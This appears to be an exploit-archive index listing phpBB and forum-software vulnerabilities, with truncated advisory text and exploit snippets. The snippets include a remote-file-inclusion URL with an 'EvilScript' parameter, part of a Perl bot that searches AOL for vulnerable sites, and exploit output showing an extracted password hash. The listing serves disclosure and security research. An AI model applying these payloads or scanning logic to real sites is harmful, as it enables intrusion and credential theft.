PHPBB 2.0.x Authentication Bypass Vulnerability (3)

No description provided by source. source: http://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. This issue is due to the application failing to properly sanitize user-supplied input during authentication. Exploitation of this vulnerability would...

phpBB Security <= 1.0.1 (php_security.php) Remote File Include Exploit

No description provided by source. !/usr/bin/perl phpBB Security 1.0.1 Class: Remote File Include Vulnerability Date: 2006/10/12 Remote: Yes Type: high Site: http://www.phpbb-amod.com/downloads/phpBBSecurity.zip...

phpBB Minerva Mod <= 2.0.21 build 238a SQL Injection Vulnerability

No description provided by source. ======================X=O=R=O=N===================== + + PHPBB Minerva Mod = 2.0.21 build 238a forum.php Remote SQL Injection Exploit + ======================X=O=R=O=N===================== + + Bulan: xoron + + xoron.biz +...

PHPBB 2.0.x Template.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/18255/info The phpBB application is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include a...

Burning Board 1.1.1 URL Parameter Manipulation Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/4512/info Burning Board is web forum software. It is written in PHP, back-ended by MySQL, and will run on most Unix and Linux variants as well as Microsoft Windows. An attacker may allegedly create a malicious link which ...

phpBB SpamOborona Mod <= 1.0b Remote File Include Exploit

No description provided by source. !/usr/bin/perl SpamOborona PHPBB Plugin Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high...

phpBB Module XS-Mod 2.3.1 - Local File Inclusion Vulnerability

No description provided by source. ..%%%%....%%%%...%%..%%...........%%%%...%%%%%...%%%%%%..%%...%%. .%%......%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%...%%. ..%%%%...%%..%%..%%%%%%..%%%%%%..%%......%%%%%...%%%%....%%.%.%%. .....%%..%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%%%%%%...

PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled)

No description provided by source...

phpBB Chart Mod 1.1 charts.php id Parameter SQL Injection

No description provided by source. source: http://www.securityfocus.com/bid/17952/info Chart Mod is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly...

phpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool (updated)

No description provided by source. !/usr/bin/perl Title: PhpBB = 2.0.18 Remote Bruteforce/Dictionary Attack Tool Type: Bruteforce / Dictionary attack New demo: http://rapidshare.de/files/13694254/phpbbbtr.avi.html 1.06 mb Php Email Script data: ? mail$destinataire, $objet, $contenu, From:...

FlashBB <= 1.1.8 (sendmsg.php) Remote File Inclusion Vulnerability

No description provided by source. !/usr/bin/perl Flashbb = 1.1.7 - Remote File Inclusion Exploit Url: http://rapidshare.com/files/41426468/FlashBBAaeDueHFcu.zip Exploit: http://site.com/path/phpbb/sendmsg.php?phpbbrootpath=EvilScript: coded and f0und3d by kw3rln officeatrosecuritygroupdotnet...

Activity MOD Plus <= 1.1.0 (phpBB Mod) File Inclusion Vulnerability

No description provided by source. phpBB 2.x Activity MOD Plus File Inclusion Vulnerability Contacts ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com This exploits works on phpBB 2.x Activity MOD Plus Original advisory can be found at: http://www.nukedx.com/?viewdoc=38 Succesful...

phpBB Ajax Shoutbox <= 0.0.5 - Remote File Include Vulnerability

No description provided by source. Title: phpBB Ajax Shoutbox = 0.0.5 phpbbrootpath Remote File Inclusion Author/Discovery: boecke Vulnerability Type: Remote File Inclusion Risk: High Risk Software Affected: phpBB Ajax Shoutbox = 0.0.5 Release Source:...

phpBB 1.x/2.0.x Multiple Input Validation Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/9942/info It has been reported that phpBB may be prone to multiple vulnerabilities that could allow an attacker to carry out SQL injection and cross-site scripting attacks. These vulnerabilities result from insufficient...

Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)

No description provided by source. /usr/bin/perl use IO::Socket; use LWP::Simple; @vul = ; $a=0; $numero = int rand999; $site = search.aol.com; $procura = viewtopic.php%3Ft%3D$numero; for$n=0;$n90;$n += 10 $sock = IO::Socket::INET-newPeerAddr=$site,PeerPort=80,Proto=tcp or next; print $sock GET...

phpBB Spider Friendly Module <= 1.3.10 File Include Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? print ' | \\ | \\ | \ . . |\ \ \ /\ \ / /| || | | | | \ | \ Y / | || | | \ | \ \ / | || | |/ // / / ||| \ | / / \ / \ |\ /\ / / \ / \ | | | | / /\ \ / \ / \ | | | | / | / Y \ || / /| /| /...

phpBB 2.0.3 search.php Cross Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/6311/info phpBB is vulnerable to cross site scripting attacks. This is due to insufficient santization of user-supplied input. The problem is located in the search.php script. This issue may be exploited by an attacker to...

PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass vulnerability)

No description provided by source. PHPBB MOD 2.0.19 Invitation Only PassCode Bypass vulnerability ------------------------------------------------------------------------------- 0 | | | | | | TM 1 | | | | | | 0 | / | ' \ / | ' \ / |/ | |/ / \ '| ' \ / \ | 1 / / | | | | / | | | | | | | / | | | | |...

Hacks List phpBB Mod <= 1.21 Remote SQL Injection Vulnerability

No description provided by source. Admin Hacks List v1.20 Remote SQL Injection Vulnerability Download: http://www.nivisec.com Found By: the master exploit:...

phpBB <= 2.0.13 'downloads.php' mod Remote Exploit

No description provided by source. !/usr/bin/perl -w use IO::Socket; Example: C:\phpbb.pl www.site.com /phpBB2/ 2 downloads.php mod in phpBB = 2.0.13 Connecting... + Connected! Sending Data... Data Sent, Waiting for response... + MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055 if...